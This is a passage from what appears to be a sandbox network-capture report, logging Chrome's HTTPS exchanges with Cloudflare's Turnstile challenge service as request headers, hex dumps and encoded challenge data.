                                                                                                        Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20g-W398UdttcHBLHXKQFMG6ZMGRmJDjbqgYiJUUbyHlxIAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                        2024-10-04 13:11:44 UTC1INData Raw: 4a
                                                                                                        Data Ascii: J


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        44192.168.2.1652653104.18.94.414431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:44 UTC926OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/868862447:1728044727:Gz7Dl8mZdZr0DP9Q4Zh7hrsdOMaLwCsED9HAlqQ_3D4/8cd56b4bca50423a/c1fc4ecc24bba50 HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        Content-Length: 31449
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        Content-type: application/x-www-form-urlencoded
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        CF-Challenge: c1fc4ecc24bba50
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Origin: https://challenges.cloudflare.com
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jxw27/0x4AAAAAAAicAxRArJzeiy3v/auto/fbE/normal/auto/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:44 UTC16384OUTData Raw: 76 5f 38 63 64 35 36 62 34 62 63 61 35 30 34 32 33 61 3d 41 32 24 6a 65 69 4e 37 4d 33 4d 43 6e 35 74 51 6d 51 47 33 24 43 67 4e 7a 51 66 51 6e 79 69 59 51 6f 51 75 6a 4e 77 4e 55 51 39 46 35 38 5a 48 51 6b 51 45 79 51 74 48 51 30 51 4a 79 57 32 79 51 64 4a 51 25 32 62 74 51 42 6a 2b 59 69 51 6c 6b 79 4e 4f 51 33 39 68 44 78 51 69 73 5a 51 57 6a 6a 43 48 36 61 79 4e 48 51 31 6a 69 77 51 32 49 59 2d 2d 30 51 57 6a 77 4e 31 51 46 4e 49 4e 74 5a 4e 4d 77 77 51 49 6a 51 54 73 51 6e 46 69 59 74 74 51 51 2b 33 51 4e 76 77 43 2d 39 51 43 59 33 51 4e 75 68 61 4a 75 24 5a 41 38 2b 4e 43 37 75 47 24 62 38 49 24 51 6c 4c 4a 37 33 68 61 65 57 35 46 6e 59 47 43 6a 4f 61 79 51 35 51 77 48 33 4c 79 34 64 51 43 41 78 73 49 49 4b 6a 68 45 5a 67 77 32 64 44 76 49 47 57 42
                                                                                                        Data Ascii: v_8cd56b4bca50423a=A2$jeiN7M3MCn5tQmQG3$CgNzQfQnyiYQoQujNwNUQ9F58ZHQkQEyQtHQ0QJyW2yQdJQ%2btQBj+YiQlkyNOQ39hDxQisZQWjjCH6ayNHQ1jiwQ2IY--0QWjwN1QFNINtZNMwwQIjQTsQnFiYttQQ+3QNvwC-9QCY3QNuhaJu$ZA8+NC7uG$b8I$QlLJ73haeW5FnYGCjOayQ5QwH3Ly4dQCAxsIIKjhEZgw2dDvIGWB
                                                                                                        2024-10-04 13:11:44 UTC15065OUTData Raw: 58 51 78 24 51 51 45 7a 67 48 4e 46 47 34 79 42 36 51 51 63 4b 37 51 4f 51 38 37 74 46 51 44 79 49 77 4c 79 57 50 66 52 63 61 54 51 69 51 79 51 6d 51 2b 79 51 52 46 4a 51 57 34 51 2b 51 48 6a 2b 59 51 46 51 35 24 77 4d 51 73 51 68 53 4e 64 72 30 51 43 54 77 6e 51 6e 51 70 6a 43 54 6e 61 51 37 79 69 37 51 79 51 47 79 4e 30 6a 48 51 57 79 35 74 4e 4a 51 77 51 57 54 4e 43 51 77 46 69 6a 51 31 4f 2b 46 35 59 4e 35 51 33 51 4e 37 51 73 67 51 6a 35 30 4e 6b 4d 41 34 69 51 43 30 6a 51 79 2b 38 4e 4c 76 6c 79 51 4d 4e 51 51 63 31 68 38 51 78 6c 51 67 53 4d 51 4f 51 6c 46 51 32 43 4e 51 38 51 35 47 51 43 51 51 37 2b 34 51 78 32 79 42 52 77 69 44 4e 79 5a 57 47 51 6f 24 33 4c 4e 65 6a 6a 24 68 53 51 24 51 6e 51 41 34 57 74 69 6c 51 67 46 2b 77 51 42 46 41 62 43 51
                                                                                                        Data Ascii: XQx$QQEzgHNFG4yB6QQcK7QOQ87tFQDyIwLyWPfRcaTQiQyQmQ+yQRFJQW4Q+QHj+YQFQ5$wMQsQhSNdr0QCTwnQnQpjCTnaQ7yi7QyQGyN0jHQWy5tNJQwQWTNCQwFijQ1O+F5YN5Q3QN7QsgQj50NkMA4iQC0jQy+8NLvlyQMNQQc1h8QxlQgSMQOQlFQ2CNQ8Q5GQCQQ7+4Qx2yBRwiDNyZWGQo$3LNejj$hSQ$QnQA4WtilQgF+wQBFAbCQ
                                                                                                        2024-10-04 13:11:45 UTC300INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 04 Oct 2024 13:11:45 GMT
                                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                                        Content-Length: 26812
                                                                                                        Connection: close
                                                                                                        cf-chl-gen: 3a70YK5p/dfdTcFN5AXidfdSuCMMDbSQR5TtNlUU1poZtNzAvDJUAA9cwbCysxfJIQtpBm0AJAq4FZHT$zcTmd6L68tpmsn0i
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8cd56b6969377d08-EWR
                                                                                                        2024-10-04 13:11:45 UTC1069INData Raw: 59 59 43 43 6a 6c 70 69 59 58 4f 4a 6a 58 46 35 68 34 4f 4e 61 5a 64 56 6e 35 52 59 6e 46 79 59 58 4b 47 6b 68 36 43 6c 6c 48 65 71 61 4a 64 75 65 59 47 4c 69 58 57 4d 64 61 31 32 74 6f 69 4e 6a 35 2b 57 74 36 70 38 70 4d 53 6c 6c 62 62 47 74 4b 65 42 71 73 6a 4d 6d 4e 43 4c 7a 73 6a 47 6c 59 33 4a 30 63 75 61 6c 35 66 50 76 38 75 71 73 63 33 4c 34 36 32 31 73 38 65 6f 32 62 62 65 35 2b 44 68 32 2b 4f 79 73 4d 66 6a 73 4e 44 33 79 37 72 6a 73 38 58 4e 32 72 76 4d 41 62 6e 35 30 39 6e 55 32 64 6b 43 34 67 62 74 42 4e 6a 39 2f 73 77 54 7a 77 44 6c 2b 41 66 34 31 2b 77 54 30 77 7a 63 44 51 76 75 46 68 51 48 44 78 6e 30 32 2f 77 55 49 41 6b 51 36 67 51 63 35 42 30 69 37 7a 4d 74 4d 2f 4d 36 4b 53 37 35 46 6a 62 79 4f 30 41 36 42 43 48 2b 42 30 51 5a 50 77 59
                                                                                                        Data Ascii: YYCCjlpiYXOJjXF5h4ONaZdVn5RYnFyYXKGkh6CllHeqaJdueYGLiXWMda12toiNj5+Wt6p8pMSllbbGtKeBqsjMmNCLzsjGlY3J0cual5fPv8uqsc3L4621s8eo2bbe5+Dh2+OysMfjsND3y7rjs8XN2rvMAbn509nU2dkC4gbtBNj9/swTzwDl+Af41+wT0wzcDQvuFhQHDxn02/wUIAkQ6gQc5B0i7zMtM/M6KS75FjbyO0A6BCH+B0QZPwY
                                                                                                        2024-10-04 13:11:45 UTC1369INData Raw: 61 4b 4e 70 61 57 4d 66 33 69 48 64 71 79 62 64 6e 61 32 71 4c 46 30 73 38 4e 39 66 63 4f 44 6c 34 62 4a 70 63 4b 66 6f 4b 43 79 71 63 4b 6f 30 70 47 66 74 70 43 73 6c 36 66 57 73 70 2f 63 79 62 53 63 33 37 32 2f 70 74 47 38 32 63 44 6b 32 2b 6e 76 6f 75 37 66 72 37 44 4b 73 4f 75 30 7a 39 6d 79 30 2f 58 53 78 2b 76 58 77 50 53 2b 74 38 44 2b 78 51 4b 38 2b 77 7a 46 78 64 33 67 7a 4e 33 4b 42 66 4c 53 44 50 6a 52 30 74 4c 76 32 75 67 68 41 50 6b 44 45 68 50 36 35 68 63 4a 34 77 58 38 46 77 77 6e 43 42 6f 6d 4a 6a 49 56 37 76 4c 75 4a 50 51 79 4b 53 58 32 46 44 74 42 48 51 30 66 2f 76 34 55 52 6a 51 59 48 41 55 34 4b 43 6f 4a 48 52 30 7a 55 78 41 69 46 41 38 31 46 56 5a 55 53 6c 55 61 45 6c 5a 50 59 43 42 45 49 6c 49 2f 52 31 4a 4c 61 6c 74 46 51 43 64 63
                                                                                                        Data Ascii: aKNpaWMf3iHdqybdna2qLF0s8N9fcODl4bJpcKfoKCyqcKo0pGftpCsl6fWsp/cybSc372/ptG82cDk2+nvou7fr7DKsOu0z9my0/XSx+vXwPS+t8D+xQK8+wzFxd3gzN3KBfLSDPjR0tLv2ughAPkDEhP65hcJ4wX8FwwnCBomJjIV7vLuJPQyKSX2FDtBHQ0f/v4URjQYHAU4KCoJHR0zUxAiFA81FVZUSlUaElZPYCBEIlI/R1JLaltFQCdc
                                                                                                        2024-10-04 13:11:45 UTC1369INData Raw: 71 6c 70 48 53 75 62 36 68 34 73 34 75 65 67 35 79 32 6f 73 47 5a 6c 71 66 45 6f 49 6d 74 78 37 75 61 73 63 62 51 6a 63 37 4e 73 4b 58 5a 72 73 6e 48 79 72 47 30 30 5a 33 68 30 72 79 7a 6d 64 57 68 6f 37 79 2f 78 36 44 70 37 36 76 44 71 36 32 76 33 39 57 33 31 37 62 36 39 65 62 50 30 4e 43 39 32 66 58 79 31 64 54 6d 32 65 44 68 42 74 37 33 78 77 62 61 79 39 33 50 30 65 7a 31 42 4e 4d 57 44 4d 33 5a 43 75 30 57 33 52 38 4e 42 50 49 54 35 64 6b 67 38 66 4d 72 34 69 76 6b 47 2f 6f 61 36 7a 45 75 39 43 49 6b 49 53 2f 33 4c 78 59 51 43 6a 51 75 4c 43 38 57 47 54 59 43 52 6a 63 68 47 45 4d 75 51 79 45 77 4a 53 77 46 54 6c 51 51 4b 42 41 53 46 45 51 36 48 44 77 62 58 32 45 78 4e 44 55 37 4e 7a 35 55 56 46 39 65 56 31 31 74 4b 6d 49 75 4f 7a 74 77 64 6c 39 70 53
                                                                                                        Data Ascii: qlpHSub6h4s4ueg5y2osGZlqfEoImtx7uascbQjc7NsKXZrsnHyrG00Z3h0ryzmdWho7y/x6Dp76vDq62v39W317b69ebP0NC92fXy1dTm2eDhBt73xwbay93P0ez1BNMWDM3ZCu0W3R8NBPIT5dkg8fMr4ivkG/oa6zEu9CIkIS/3LxYQCjQuLC8WGTYCRjchGEMuQyEwJSwFTlQQKBASFEQ6HDwbX2ExNDU7Nz5UVF9eV11tKmIuOztwdl9pS
                                                                                                        2024-10-04 13:11:45 UTC1369INData Raw: 48 76 4b 32 71 73 71 57 39 6e 4c 65 49 77 49 71 2f 70 38 61 36 72 61 43 6c 76 59 79 79 76 63 4b 51 70 70 4c 45 6c 4d 2f 5a 79 4a 6a 54 6b 39 69 76 75 39 72 44 6f 39 76 62 78 72 72 62 76 4d 54 48 36 73 50 75 34 2f 47 74 73 4b 6e 77 39 38 4f 30 74 76 6e 52 38 38 6d 7a 33 66 33 4e 42 50 77 43 30 4f 6e 53 41 4f 4d 4c 31 39 33 50 37 64 44 73 7a 66 41 4c 37 50 4d 44 39 67 58 71 44 39 72 74 36 66 33 7a 33 78 6e 78 41 2f 59 59 39 78 73 45 4a 69 59 72 49 69 37 72 4c 4f 55 73 4a 41 41 35 41 78 41 78 47 76 49 38 45 67 41 39 44 45 45 4e 4d 6a 5a 42 2b 51 67 57 4e 45 77 33 51 52 67 69 54 79 41 71 48 53 68 50 4a 52 52 4e 49 69 73 71 4d 53 6c 48 4b 46 31 4f 47 55 35 44 52 69 49 6e 49 6b 4e 42 4b 79 5a 48 50 6a 35 45 59 6a 30 38 63 57 4a 6f 59 6c 64 61 58 45 56 30 63 6c
                                                                                                        Data Ascii: HvK2qsqW9nLeIwIq/p8a6raClvYyyvcKQppLElM/ZyJjTk9ivu9rDo9vbxrrbvMTH6sPu4/GtsKnw98O0tvnR88mz3f3NBPwC0OnSAOML193P7dDszfAL7PMD9gXqD9rt6f3z3xnxA/YY9xsEJiYrIi7rLOUsJAA5AxAxGvI8EgA9DEENMjZB+QgWNEw3QRgiTyAqHShPJRRNIisqMSlHKF1OGU5DRiInIkNBKyZHPj5EYj08cWJoYldaXEV0cl
                                                                                                        2024-10-04 13:11:45 UTC1369INData Raw: 77 59 47 56 74 36 61 6f 6d 4d 75 36 69 4d 32 65 6e 73 2b 66 30 70 54 56 74 49 2b 6e 73 5a 50 49 33 4e 33 68 75 72 4f 76 73 4e 37 53 6f 37 58 69 76 71 76 74 72 63 69 6c 71 4c 6e 4c 39 4f 62 49 76 38 7a 30 30 66 57 31 79 65 76 61 33 4d 77 41 37 72 77 43 30 74 4c 2b 30 73 4c 43 2b 65 62 4c 37 67 44 68 42 51 37 6e 41 4d 38 57 35 65 6f 59 32 4f 72 6d 47 42 34 49 47 78 76 79 2f 53 44 63 34 42 2f 69 41 79 77 66 4a 52 77 49 42 78 77 52 4a 78 51 6c 44 67 67 45 42 6a 48 36 47 52 55 72 45 52 4c 79 2f 6a 59 73 44 68 4d 59 41 6a 59 30 4e 6b 59 68 50 67 70 45 50 79 6b 6b 52 6a 51 51 4d 45 55 73 46 31 77 72 52 69 59 2f 56 45 38 35 50 46 74 45 49 44 6c 45 55 6d 6f 69 61 57 5a 5a 51 47 6f 36 59 6d 38 38 4e 46 52 55 5a 32 74 4a 4f 6a 4e 51 4f 33 68 50 59 6c 78 42 65 6d 35
                                                                                                        Data Ascii: wYGVt6aomMu6iM2ens+f0pTVtI+nsZPI3N3hurOvsN7So7XivqvtrcilqLnL9ObIv8z00fW1yeva3MwA7rwC0tL+0sLC+ebL7gDhBQ7nAM8W5eoY2OrmGB4IGxvy/SDc4B/iAywfJRwIBxwRJxQlDggEBjH6GRUrERLy/jYsDhMYAjY0NkYhPgpEPykkRjQQMEUsF1wrRiY/VE85PFtEIDlEUmoiaWZZQGo6Ym88NFRUZ2tJOjNQO3hPYlxBem5
                                                                                                        2024-10-04 13:11:45 UTC1369INData Raw: 37 6d 32 69 74 43 61 6f 4c 79 6c 6c 4e 53 73 78 73 65 36 30 63 71 30 75 73 36 7a 73 64 48 4f 7a 72 50 51 36 4c 33 5a 74 2b 7a 4e 37 73 43 75 75 72 72 4a 77 64 4c 4a 72 2b 6a 43 73 39 44 76 38 66 7a 61 78 38 77 41 37 4e 51 42 37 74 54 37 75 74 33 34 35 41 45 4f 2b 2b 50 62 38 68 48 68 35 76 58 65 79 64 49 61 35 39 6e 78 2f 42 59 51 43 39 6f 61 44 78 44 7a 45 68 38 52 47 68 6b 68 47 41 77 41 4d 52 6b 6c 36 75 6f 57 37 69 6f 77 43 51 67 50 4d 69 59 2b 4b 76 63 68 4e 78 67 38 4a 43 55 67 50 54 45 6f 51 54 6f 32 50 6a 34 48 4a 43 45 6a 53 55 41 31 4b 45 56 43 53 69 52 62 4d 31 35 4e 59 44 56 6a 4e 31 38 35 5a 6a 67 66 4f 6d 70 48 59 6c 64 65 50 33 42 46 63 30 64 76 53 58 5a 68 4d 47 4a 75 55 44 4e 6e 4e 7a 74 34 55 56 46 50 64 46 6c 33 57 34 6c 63 5a 56 2b 45
                                                                                                        Data Ascii: 7m2itCaoLyllNSsxse60cq0us6zsdHOzrPQ6L3Zt+zN7sCuurrJwdLJr+jCs9Dv8fzax8wA7NQB7tT7ut345AEO++Pb8hHh5vXeydIa59nx/BYQC9oaDxDzEh8RGhkhGAwAMRkl6uoW7iowCQgPMiY+KvchNxg8JCUgPTEoQTo2Pj4HJCEjSUA1KEVCSiRbM15NYDVjN185ZjgfOmpHYldeP3BFc0dvSXZhMGJuUDNnNzt4UVFPdFl3W4lcZV+E
                                                                                                        2024-10-04 13:11:45 UTC1369INData Raw: 32 6e 31 71 72 56 72 71 54 45 32 72 43 6f 79 4a 6d 7a 75 2b 44 66 75 62 43 36 34 72 7a 5a 6f 65 7a 41 79 4d 61 71 77 37 75 74 72 73 6a 51 76 76 62 4d 36 62 48 33 7a 2b 32 39 2b 64 50 63 30 67 44 5a 7a 37 33 43 32 77 76 53 78 75 44 58 44 51 76 6a 45 39 6f 56 36 52 63 46 7a 75 7a 6a 32 52 62 77 44 2b 59 66 38 78 4c 64 4a 66 63 58 38 75 4c 37 38 2b 6e 69 41 42 2f 2b 36 67 66 37 38 65 30 4c 41 51 4d 79 44 44 73 6c 4f 42 45 2f 42 7a 38 58 44 50 6e 2b 47 78 42 46 52 42 78 4c 47 30 67 68 47 52 73 4c 4a 45 4d 62 56 43 67 67 45 6c 67 73 57 7a 4d 58 4d 79 6c 4e 58 54 55 73 47 6c 34 34 51 43 49 66 50 7a 51 6d 61 45 42 66 51 79 74 46 50 48 46 76 53 30 41 75 65 55 78 56 5a 58 70 53 53 55 64 39 56 45 31 62 67 6c 68 32 51 6f 52 63 65 32 4f 4c 59 57 6c 6e 69 6d 53 44 59
                                                                                                        Data Ascii: 2n1qrVrqTE2rCoyJmzu+DfubC64rzZoezAyMaqw7utrsjQvvbM6bH3z+29+dPc0gDZz73C2wvSxuDXDQvjE9oV6RcFzuzj2RbwD+Yf8xLdJfcX8uL78+niAB/+6gf78e0LAQMyDDslOBE/Bz8XDPn+GxBFRBxLG0ghGRsLJEMbVCggElgsWzMXMylNXTUsGl44QCIfPzQmaEBfQytFPHFvS0AueUxVZXpSSUd9VE1bglh2QoRce2OLYWlnimSDY
                                                                                                        2024-10-04 13:11:45 UTC1369INData Raw: 4a 6b 61 32 34 72 70 61 32 30 74 69 64 74 74 62 51 35 72 2b 30 36 4b 4b 39 37 63 72 73 78 4b 33 73 73 65 48 32 30 2b 66 67 31 37 58 78 36 76 37 34 2f 64 58 68 31 73 4c 76 39 66 30 43 36 4d 49 43 2b 76 66 62 2f 4d 66 2b 45 75 37 52 35 78 66 6d 44 51 54 34 36 77 6b 47 44 75 6a 6f 39 74 76 62 41 66 6a 32 49 53 49 5a 39 43 62 72 49 41 6a 67 47 51 51 43 48 66 45 69 46 78 4d 30 4c 54 6f 37 43 68 50 33 39 78 30 55 49 7a 30 2b 4e 43 46 43 43 44 77 6c 4a 54 55 67 48 6b 30 4f 50 6a 4d 76 56 55 6c 57 56 79 73 76 46 42 51 35 4d 56 56 5a 57 6c 46 54 58 69 52 59 51 54 56 52 50 6b 67 38 59 31 5a 65 58 7a 70 48 63 7a 73 73 53 57 64 50 4e 57 64 72 57 55 5a 4f 57 46 74 31 62 47 46 55 63 57 35 32 55 56 6c 66 52 56 74 45 62 6b 64 66 68 6d 53 54 59 31 47 44 68 6f 4b 59 65 46
                                                                                                        Data Ascii: Jka24rpa20tidttbQ5r+06KK97crsxK3sseH20+fg17Xx6v74/dXh1sLv9f0C6MIC+vfb/Mf+Eu7R5xfmDQT46wkGDujo9tvbAfj2ISIZ9CbrIAjgGQQCHfEiFxM0LTo7ChP39x0UIz0+NCFCCDwlJTUgHk0OPjMvVUlWVysvFBQ5MVVZWlFTXiRYQTVRPkg8Y1ZeXzpHczssSWdPNWdrWUZOWFt1bGFUcW52UVlfRVtEbkdfhmSTY1GDhoKYeF


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        45192.168.2.1652654104.18.94.414431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:45 UTC486OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/868862447:1728044727:Gz7Dl8mZdZr0DP9Q4Zh7hrsdOMaLwCsED9HAlqQ_3D4/8cd56b4bca50423a/c1fc4ecc24bba50 HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:45 UTC349INHTTP/1.1 404 Not Found
                                                                                                        Date: Fri, 04 Oct 2024 13:11:45 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 7
                                                                                                        Connection: close
                                                                                                        cf-chl-out: JKZYNklXl9Xldx8C3rbvEQmo8dnWw7Hmor0=$fcb97HyfDrm7dHeD
                                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8cd56b6f3e086a57-EWR
                                                                                                        2024-10-04 13:11:45 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                        Data Ascii: invalid


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        46192.168.2.1652655104.18.94.414431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:48 UTC926OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/868862447:1728044727:Gz7Dl8mZdZr0DP9Q4Zh7hrsdOMaLwCsED9HAlqQ_3D4/8cd56b4bca50423a/c1fc4ecc24bba50 HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        Content-Length: 33884
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        Content-type: application/x-www-form-urlencoded
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        CF-Challenge: c1fc4ecc24bba50
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Origin: https://challenges.cloudflare.com
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jxw27/0x4AAAAAAAicAxRArJzeiy3v/auto/fbE/normal/auto/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:48 UTC16384OUTData Raw: 76 5f 38 63 64 35 36 62 34 62 63 61 35 30 34 32 33 61 3d 41 32 24 6a 65 69 4e 37 4d 33 4d 43 6e 35 74 51 6d 51 47 33 24 43 67 4e 7a 51 66 51 6e 79 69 59 51 6f 51 75 6a 4e 77 4e 55 51 39 46 35 38 5a 48 51 6b 51 45 79 51 74 48 51 30 51 4a 79 57 32 79 51 64 4a 51 25 32 62 74 51 42 6a 2b 59 69 51 6c 6b 79 4e 4f 51 33 39 68 44 78 51 69 73 5a 51 57 6a 6a 43 48 36 61 79 4e 48 51 31 6a 69 77 51 32 49 59 2d 2d 30 51 57 6a 77 4e 31 51 46 4e 49 4e 74 5a 4e 4d 77 77 51 49 6a 51 54 73 51 6e 46 69 59 74 74 51 51 2b 33 51 4e 76 77 43 2d 39 51 43 59 33 51 4e 75 68 61 4a 75 24 5a 41 38 2b 4e 43 37 75 47 24 62 38 49 24 51 6c 4c 4a 37 33 68 61 65 57 35 46 6e 59 47 43 6a 4f 61 79 51 35 51 77 48 33 4c 79 34 64 51 43 41 78 73 49 49 4b 6a 68 45 5a 67 77 32 64 44 76 49 47 57 42
                                                                                                        Data Ascii: v_8cd56b4bca50423a=A2$jeiN7M3MCn5tQmQG3$CgNzQfQnyiYQoQujNwNUQ9F58ZHQkQEyQtHQ0QJyW2yQdJQ%2btQBj+YiQlkyNOQ39hDxQisZQWjjCH6ayNHQ1jiwQ2IY--0QWjwN1QFNINtZNMwwQIjQTsQnFiYttQQ+3QNvwC-9QCY3QNuhaJu$ZA8+NC7uG$b8I$QlLJ73haeW5FnYGCjOayQ5QwH3Ly4dQCAxsIIKjhEZgw2dDvIGWB
                                                                                                        2024-10-04 13:11:48 UTC16384OUTData Raw: 58 51 78 24 51 51 45 7a 67 48 4e 46 47 34 79 42 36 51 51 63 4b 37 51 4f 51 38 37 74 46 51 44 79 49 77 4c 79 57 50 66 52 63 61 54 51 69 51 79 51 6d 51 2b 79 51 52 46 4a 51 57 34 51 2b 51 48 6a 2b 59 51 46 51 35 24 77 4d 51 73 51 68 53 4e 64 72 30 51 43 54 77 6e 51 6e 51 70 6a 43 54 6e 61 51 37 79 69 37 51 79 51 47 79 4e 30 6a 48 51 57 79 35 74 4e 4a 51 77 51 57 54 4e 43 51 77 46 69 6a 51 31 4f 2b 46 35 59 4e 35 51 33 51 4e 37 51 73 67 51 6a 35 30 4e 6b 4d 41 34 69 51 43 30 6a 51 79 2b 38 4e 4c 76 6c 79 51 4d 4e 51 51 63 31 68 38 51 78 6c 51 67 53 4d 51 4f 51 6c 46 51 32 43 4e 51 38 51 35 47 51 43 51 51 37 2b 34 51 78 32 79 42 52 77 69 44 4e 79 5a 57 47 51 6f 24 33 4c 4e 65 6a 6a 24 68 53 51 24 51 6e 51 41 34 57 74 69 6c 51 67 46 2b 77 51 42 46 41 62 43 51
                                                                                                        Data Ascii: XQx$QQEzgHNFG4yB6QQcK7QOQ87tFQDyIwLyWPfRcaTQiQyQmQ+yQRFJQW4Q+QHj+YQFQ5$wMQsQhSNdr0QCTwnQnQpjCTnaQ7yi7QyQGyN0jHQWy5tNJQwQWTNCQwFijQ1O+F5YN5Q3QN7QsgQj50NkMA4iQC0jQy+8NLvlyQMNQQc1h8QxlQgSMQOQlFQ2CNQ8Q5GQCQQ7+4Qx2yBRwiDNyZWGQo$3LNejj$hSQ$QnQA4WtilQgF+wQBFAbCQ
                                                                                                        2024-10-04 13:11:48 UTC1116OUTData Raw: 4d 32 41 49 2d 70 30 79 38 30 36 2b 49 4a 61 51 47 79 56 47 51 66 44 4d 59 76 79 73 57 4f 4c 64 2b 59 51 63 64 6f 5a 33 4b 4b 33 46 7a 50 39 52 52 38 4d 57 33 69 42 58 61 51 4c 50 50 75 56 31 4f 43 64 33 66 67 62 78 67 59 48 65 2d 70 77 41 37 54 33 66 4c 79 2d 6a 58 5a 4e 58 51 43 46 57 44 67 35 57 6e 79 77 70 6a 6a 31 38 6a 51 54 4e 31 6a 68 69 2b 57 69 2d 79 76 4f 64 6e 43 6e 37 68 44 45 24 2d 4c 79 4b 4c 67 57 42 24 7a 30 32 51 2b 62 56 31 5a 63 39 62 6a 62 51 37 2b 77 58 45 38 69 56 48 33 32 69 42 4a 2b 72 42 6b 52 74 7a 52 4f 46 55 56 24 4d 68 45 54 59 51 36 46 34 47 44 6f 52 41 66 78 46 43 6c 53 6f 30 2d 6b 6c 38 79 74 79 4b 6d 75 38 51 39 42 59 59 2b 66 30 63 4f 45 67 52 6e 51 49 4c 4b 61 51 38 51 6b 30 49 51 34 45 2b 49 51 48 6b 30 64 51 78 51 39
                                                                                                        Data Ascii: M2AI-p0y806+IJaQGyVGQfDMYvysWOLd+YQcdoZ3KK3FzP9RR8MW3iBXaQLPPuV1OCd3fgbxgYHe-pwA7T3fLy-jXZNXQCFWDg5Wnywpjj18jQTN1jhi+Wi-yvOdnCn7hDE$-LyKLgWB$z02Q+bV1Zc9bjbQ7+wXE8iVH32iBJ+rBkRtzROFUV$MhETYQ6F4GDoRAfxFClSo0-kl8ytyKmu8Q9BYY+f0cOEgRnQILKaQ8Qk0IQ4E+IQHk0dQxQ9
                                                                                                        2024-10-04 13:11:48 UTC1291INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 04 Oct 2024 13:11:48 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Content-Length: 4552
                                                                                                        Connection: close
                                                                                                        cf-chl-out: //sLr/5M4PqK742gNTF9mho/M+d+AOYjXJkGOlPwa/BsTeaw/xuX9mZxghgtwaOWBxqrPEMRNTBQ1KaImMcOky0L2+KDZ7BNtIAV7SHHckqFtpkVF8tGJuw=$JZi6JTH+JMLDeHn4
